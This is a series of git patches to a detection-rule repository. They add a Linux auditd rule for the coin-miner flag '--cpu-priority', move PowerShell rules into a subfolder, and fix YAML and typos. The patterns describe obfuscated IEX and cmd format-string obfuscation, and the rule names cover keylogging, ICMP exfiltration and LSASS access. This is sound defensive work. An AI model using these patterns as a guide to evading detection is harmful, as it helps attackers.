selection_4103 From 77749510b72ff2c3fb9f2f4d3b3879b55f6d5c74 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 9 Oct 2021 10:01:40 +0200 Subject: [PATCH 1192/1367] fix yml --- ...ell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml index 3e4126e7..687ea802 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml @@ -26,7 +26,7 @@ detection: - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' - condition: selection_1 and selection_2 + condition: selection_1 and selection_2 falsepositives: - Unknown level: high From 6c4e24d0de62927bd72d776396ef299409997937 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 9 Oct 2021 10:28:16 +0200 Subject: [PATCH 1193/1367] rule: coin miner param --cpu-priority --- rules/linux/auditd/lnx_auditd_coinminer.yml | 33 +++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_coinminer.yml diff --git a/rules/linux/auditd/lnx_auditd_coinminer.yml b/rules/linux/auditd/lnx_auditd_coinminer.yml new file mode 100644 index 00000000..8a311ec4 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_coinminer.yml @@ -0,0 +1,33 @@ +title: Possible Coin Miner CPU Priority Param +id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed +status: experimental +description: Detects command line parameter very often used with coin miners +author: Florian Roth +date: 2021/10/09 +references: + - https://xmrig.com/docs/miner/command-line-options +tags: + - attack.privilege_escalation + - attack.t1068 +logsource: + product: linux + service: auditd +detection: + cmd1: + a1|startswith: '--cpu-priority' + cmd2: + a2|startswith: '--cpu-priority' + cmd3: + a3|startswith: '--cpu-priority' + cmd4: + a4|startswith: '--cpu-priority' + cmd5: + a5|startswith: '--cpu-priority' + cmd6: + a6|startswith: '--cpu-priority' + cmd7: + a7|startswith: '--cpu-priority' + condition: 1 of them +falsepositives: + - Other tools that use a --cpu-priority flag +level: critical \ No newline at end of file From 5c68c42058b88bb830af394a4c2bd2ff99aa28b8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 9 Oct 2021 10:30:36 +0200 Subject: [PATCH 1194/1367] order powershell_script --- .../powershell_module/powershell_invoke_obfuscation_var.yml | 1 + .../powershell_module/powershell_susp_zip_compress.yml | 2 +- .../{ => powershell_script}/powershell_adrecon_execution.yml | 0 .../{ => powershell_script}/powershell_automated_collection.yml | 0 .../powershell_cl_invocation_lolscript.yml | 0 .../powershell_cl_invocation_lolscript_count.yml | 0 .../powershell_cl_mutexverifiers_lolscript.yml | 0 .../powershell_cl_mutexverifiers_lolscript_count.yml | 0 .../{ => powershell_script}/powershell_create_local_user.yml | 0 .../{ => powershell_script}/powershell_data_compressed.yml | 0 .../{ => powershell_script}/powershell_detect_vm_env.yml | 0 .../{ => powershell_script}/powershell_dnscat_execution.yml | 0 .../{ => powershell_script}/powershell_icmp_exfiltration.yml | 0 .../{ => powershell_script}/powershell_invoke_nightmare.yml | 0 .../{ => powershell_script}/powershell_keylogging.yml | 0 .../powershell_malicious_commandlets.yml | 0 .../{ => powershell_script}/powershell_malicious_keywords.yml | 0 .../powershell_memorydump_getstoragediagnosticinfo.yml | 0 .../powershell_nishang_malicious_commandlets.yml | 0 .../{ => powershell_script}/powershell_ntfs_ads_access.yml | 0 .../powershell_powerview_malicious_commandlets.yml | 0 .../{ => powershell_script}/powershell_prompt_credentials.yml | 0 .../powershell/{ => powershell_script}/powershell_psattack.yml | 0 .../{ => powershell_script}/powershell_shellcode_b64.yml | 0 .../powershell_shellintel_malicious_commandlets.yml | 0 .../powershell_store_file_in_alternate_data_stream.yml | 0 .../powershell_suspicious_export_pfxcertificate.yml | 0 .../powershell_suspicious_getprocess_lsass.yml | 0 .../{ => powershell_script}/powershell_suspicious_keywords.yml | 0 .../powershell_suspicious_mail_acces.yml | 0 .../powershell_suspicious_mounted_share_deletion.yml | 0 .../{ => powershell_script}/powershell_suspicious_recon.yml | 0 .../powershell_suspicious_win32_pnpentity.yml | 0 .../powershell/{ => powershell_script}/powershell_timestomp.yml | 0 .../{ => powershell_script}/powershell_trigger_profiles.yml | 0 .../{ => powershell_script}/powershell_web_request.yml | 0 .../{ => powershell_script}/powershell_winlogon_helper_dll.yml | 0 .../{ => powershell_script}/powershell_wmi_persistence.yml | 0 .../powershell/{ => powershell_script}/powershell_wmimplant.yml | 0 39 files changed, 2 insertions(+), 1 deletion(-) rename rules/windows/powershell/{ => powershell_script}/powershell_adrecon_execution.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_automated_collection.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_cl_invocation_lolscript.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_cl_invocation_lolscript_count.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_cl_mutexverifiers_lolscript.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_cl_mutexverifiers_lolscript_count.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_create_local_user.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_data_compressed.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_detect_vm_env.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_dnscat_execution.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_icmp_exfiltration.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_invoke_nightmare.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_keylogging.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_malicious_commandlets.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_malicious_keywords.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_memorydump_getstoragediagnosticinfo.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_nishang_malicious_commandlets.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_ntfs_ads_access.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_powerview_malicious_commandlets.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_prompt_credentials.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_psattack.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_shellcode_b64.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_shellintel_malicious_commandlets.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_store_file_in_alternate_data_stream.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_export_pfxcertificate.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_getprocess_lsass.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_keywords.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_mail_acces.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_mounted_share_deletion.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_recon.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_suspicious_win32_pnpentity.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_timestomp.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_trigger_profiles.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_web_request.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_winlogon_helper_dll.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_wmi_persistence.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_wmimplant.yml (100%) diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index 6f187cfb..e47caf11 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -18,6 +18,7 @@ logsource: product: windows service: powershell definition: Module Logging must be enable +detection: selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index ab97eb0d..26753203 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -2,7 +2,7 @@ title: Zip A Folder With PowerShell For Staging In Temp id: daf7eb81-35fd-410d-9d7a-657837e602bb related: - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - related: derived + type: derived status: experimental author: frack113 date: 2021/07/20 diff --git a/rules/windows/powershell/powershell_adrecon_execution.yml b/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml similarity index 100% rename from rules/windows/powershell/powershell_adrecon_execution.yml rename to rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_script/powershell_automated_collection.yml similarity index 100% rename from rules/windows/powershell/powershell_automated_collection.yml rename to rules/windows/powershell/powershell_script/powershell_automated_collection.yml diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml similarity index 100% rename from rules/windows/powershell/powershell_cl_invocation_lolscript.yml rename to rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml similarity index 100% rename from rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml rename to rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml similarity index 100% rename from rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml rename to rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml similarity index 100% rename from rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml rename to rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml diff --git a/rules/windows/powershell/powershell_create_local_user.yml b/rules/windows/powershell/powershell_script/powershell_create_local_user.yml similarity index 100% rename from rules/windows/powershell/powershell_create_local_user.yml rename to rules/windows/powershell/powershell_script/powershell_create_local_user.yml diff --git a/rules/windows/powershell/powershell_data_compressed.yml b/rules/windows/powershell/powershell_script/powershell_data_compressed.yml similarity index 100% rename from rules/windows/powershell/powershell_data_compressed.yml rename to rules/windows/powershell/powershell_script/powershell_data_compressed.yml diff --git a/rules/windows/powershell/powershell_detect_vm_env.yml b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml similarity index 100% rename from rules/windows/powershell/powershell_detect_vm_env.yml rename to rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml diff --git a/rules/windows/powershell/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml similarity index 100% rename from rules/windows/powershell/powershell_dnscat_execution.yml rename to rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml diff --git a/rules/windows/powershell/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml similarity index 100% rename from rules/windows/powershell/powershell_icmp_exfiltration.yml rename to rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_nightmare.yml rename to rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml diff --git a/rules/windows/powershell/powershell_keylogging.yml b/rules/windows/powershell/powershell_script/powershell_keylogging.yml similarity index 100% rename from rules/windows/powershell/powershell_keylogging.yml rename to rules/windows/powershell/powershell_script/powershell_keylogging.yml diff --git a/rules/windows/powershell/powershell_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml similarity index 100% rename from rules/windows/powershell/powershell_malicious_commandlets.yml rename to rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml diff --git a/rules/windows/powershell/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml similarity index 100% rename from rules/windows/powershell/powershell_malicious_keywords.yml rename to rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml similarity index 100% rename from rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml rename to rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml diff --git a/rules/windows/powershell/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml similarity index 100% rename from rules/windows/powershell/powershell_nishang_malicious_commandlets.yml rename to rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml diff --git a/rules/windows/powershell/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml similarity index 100% rename from rules/windows/powershell/powershell_ntfs_ads_access.yml rename to rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml diff --git a/rules/windows/powershell/powershell_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml similarity index 100% rename from rules/windows/powershell/powershell_powerview_malicious_commandlets.yml rename to rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml diff --git a/rules/windows/powershell/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml similarity index 100% rename from rules/windows/powershell/powershell_prompt_credentials.yml rename to rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml diff --git a/rules/windows/powershell/powershell_psattack.yml b/rules/windows/powershell/powershell_script/powershell_psattack.yml similarity index 100% rename from rules/windows/powershell/powershell_psattack.yml rename to rules/windows/powershell/powershell_script/powershell_psattack.yml diff --git a/rules/windows/powershell/powershell_shellcode_b64.yml b/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml similarity index 100% rename from rules/windows/powershell/powershell_shellcode_b64.yml rename to rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml diff --git a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml similarity index 100% rename from rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml rename to rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml diff --git a/rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml similarity index 100% rename from rules/windows/powershell/powershell_store_file_in_alternate_data_stream.yml rename to rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml diff --git a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_keywords.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_mail_acces.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml diff --git a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml diff --git a/rules/windows/powershell/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_recon.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml diff --git a/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml rename to rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml diff --git a/rules/windows/powershell/powershell_timestomp.yml b/rules/windows/powershell/powershell_script/powershell_timestomp.yml similarity index 100% rename from rules/windows/powershell/powershell_timestomp.yml rename to rules/windows/powershell/powershell_script/powershell_timestomp.yml diff --git a/rules/windows/powershell/powershell_trigger_profiles.yml b/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml similarity index 100% rename from rules/windows/powershell/powershell_trigger_profiles.yml rename to rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml diff --git a/rules/windows/powershell/powershell_web_request.yml b/rules/windows/powershell/powershell_script/powershell_web_request.yml similarity index 100% rename from rules/windows/powershell/powershell_web_request.yml rename to rules/windows/powershell/powershell_script/powershell_web_request.yml diff --git a/rules/windows/powershell/powershell_winlogon_helper_dll.yml b/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml similarity index 100% rename from rules/windows/powershell/powershell_winlogon_helper_dll.yml rename to rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml similarity index 100% rename from rules/windows/powershell/powershell_wmi_persistence.yml rename to rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml diff --git a/rules/windows/powershell/powershell_wmimplant.yml b/rules/windows/powershell/powershell_script/powershell_wmimplant.yml similarity index 100% rename from rules/windows/powershell/powershell_wmimplant.yml rename to rules/windows/powershell/powershell_script/powershell_wmimplant.yml From f475b90ee336c9b8d3de5667dec3c3b4e42ce837 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 9 Oct 2021 16:41:48 +0200 Subject: [PATCH 1195/1367] fix: typo in description --- .../powershell_module/powershell_alternate_powershell_hosts.yml | 2 +- .../powershell_module/powershell_bad_opsec_artifacts.yml | 2 +- .../powershell_module/powershell_clear_powershell_history.yml | 2 +- .../powershell_module/powershell_decompress_commands.yml | 2 +- .../powershell/powershell_module/powershell_get_clipboard.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_clip.yml | 2 +- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_stdin.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_var.yml | 2 +- .../powershell_invoke_obfuscation_via_compress.yml | 2 +- .../powershell_invoke_obfuscation_via_rundll.yml | 2 +- .../powershell_invoke_obfuscation_via_stdin.yml | 2 +- .../powershell_invoke_obfuscation_via_use_clip.yml | 2 +- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 2 +- .../powershell_module/powershell_invoke_obfuscation_via_var.yml | 2 +- .../powershell/powershell_module/powershell_powercat.yml | 2 +- .../powershell_module/powershell_remote_powershell_session.yml | 2 +- .../powershell_susp_athremotefxvgpudisablementcommand.yml | 2 +- .../powershell_module/powershell_susp_zip_compress.yml | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index fb409b13..7ab2c944 100644 --- a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index dcb92bd0..c5153e21 100644 --- a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -19,7 +19,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index fb57e960..48f64acc 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index e30c7fe3..d1c7e564 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection2: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 2902ece6..61e99ec3 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -17,7 +17,7 @@ references: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection2: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index 604505ae..a825ff6d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index 2dcd9ad2..c94e328d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_3: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index d531c87e..ac820014 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index e47caf11..3fb82c2e 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index e4f1400c..9faa95df 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index 82369978..bff58af6 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index 65fff0f1..ef94a8c3 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 482721a0..6e5b5d32 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index ab47039d..aecbcfcf 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index deee26ed..e97a7449 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 06d3381a..4273a271 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -18,7 +18,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: Module Logging must be enabledd detection: selection_4103: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml index f024c450..3feb349e 100644 --- a/rules/windows/powershell/powershell_module/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_module/powershell_powercat.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enable + definition: Module Logging must be enabled detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index c7795387..39a6161c 100644 --- a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -17,7 +17,7 @@ tags: logsource: product: windows service: powershell - definition: Module Logging 